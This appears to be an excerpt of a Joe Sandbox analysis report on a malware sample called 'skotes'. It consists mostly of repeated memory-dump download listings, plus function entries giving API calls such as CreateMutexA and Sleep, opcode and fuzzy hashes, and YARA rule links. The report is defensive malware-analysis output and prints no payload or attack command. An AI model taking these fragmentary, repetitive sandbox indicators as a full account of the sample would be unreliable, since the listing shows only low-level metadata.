Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 87bf7f19ed01d31233dbad31424dd410c64ea2b6f3c983cd57d89bd968f0931f
Instruction ID: ef67a929bb6bed55d552c7d36a23915ceaa1ea8466093bd00aa5b3f988981c82
Opcode Fuzzy Hash: 87bf7f19ed01d31233dbad31424dd410c64ea2b6f3c983cd57d89bd968f0931f
Instruction Fuzzy Hash: CA217F712452809BFB24676E9C9673DB7D5DF82300F2489E6E504D72D2CFB5A9818153

Function 00BEA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 179da433d8d050e358a9888a534a34754a3a522119b10765dc271b794c76f9a9
Instruction ID: 40d0aca07eaa1353ff1f87aa0056ca8540a94763c55a0a01f4742a30ced95f1f
Opcode Fuzzy Hash: 179da433d8d050e358a9888a534a34754a3a522119b10765dc271b794c76f9a9
Instruction Fuzzy Hash: AC214C317042809BEB189B6DDC8576CB7E6EBC2310F244659E404DB6D6C7B575848653

Function 00C1D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C1A813,00000001,00000364,00000006,000000FF,?,00C1EE3F,?,00000004,00000000,?,?), ref: 00C1D870

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cfbd2be9b0227e1a7e8e071451dc6fcd31bbed815a11c8f64d003fb178f8eee3
Instruction ID: 0391361d972a1afa1ee54b358b73f123eb39ba906e3e450c1a2c74249ef86213
Opcode Fuzzy Hash: cfbd2be9b0227e1a7e8e071451dc6fcd31bbed815a11c8f64d003fb178f8eee3
Instruction Fuzzy Hash: 28F0E23260512466FF213A729C01BDB3B59DF83770B288121FC1AA71D1DA30DD81B6E1

Non-executed Functions

Function 00BE2EC0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00BE2F5F
__Mtx_unlock.LIBCPMT ref: 00BE2FCC
__Cnd_broadcast.LIBCPMT ref: 00BE2FE3
__Mtx_unlock.LIBCPMT ref: 00BE30F5
__Mtx_unlock.LIBCPMT ref: 00BE319B

Strings

s|-I, xrefs: 00BE2ED7, 00BE3054, 00BE3203

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID: s|-I
API String ID: 32384418-705684097
Opcode ID: 5da12131bcbbe1435ffa4acc6d700590997d5cd57cfcc967dac3d83f2096290a
Instruction ID: beef3fd9b833f2df0854626b2d53be5178c5e95ae162f9740d65d43676d916e3
Opcode Fuzzy Hash: 5da12131bcbbe1435ffa4acc6d700590997d5cd57cfcc967dac3d83f2096290a
Instruction Fuzzy Hash: 02A10670901249EFDB10DF66C94876ABBF8FF15710F0481A9E915D7242EB35DA08CBD1

Function 00BFBB72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00BFBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00BFBBE4
_xtime_get.LIBCPMT ref: 00BFBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00BFBC13

Strings

s|-I, xrefs: 00BFBB78

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID: s|-I
API String ID: 531285432-705684097
Opcode ID: 34dbf5ea86c0f535f0327ea6d2c3b3596c916e88e754a6628b9c5592cacf6817
Instruction ID: c8064f495d2dfb4ebe862086979898f466a28cb1d16ca585a62f81bb9fd174b9
Opcode Fuzzy Hash: 34dbf5ea86c0f535f0327ea6d2c3b3596c916e88e754a6628b9c5592cacf6817
Instruction Fuzzy Hash: DB212F75A0011DAFDF00EFA8DD81EBEBBB9EF08714F500495FA01A7251DB319D499BA0

Function 00C24C14 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00C24DCA
__freea.LIBCMT ref: 00C24DD3
__freea.LIBCMT ref: 00C24DF6

Strings

s|-I, xrefs: 00C24C1B

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
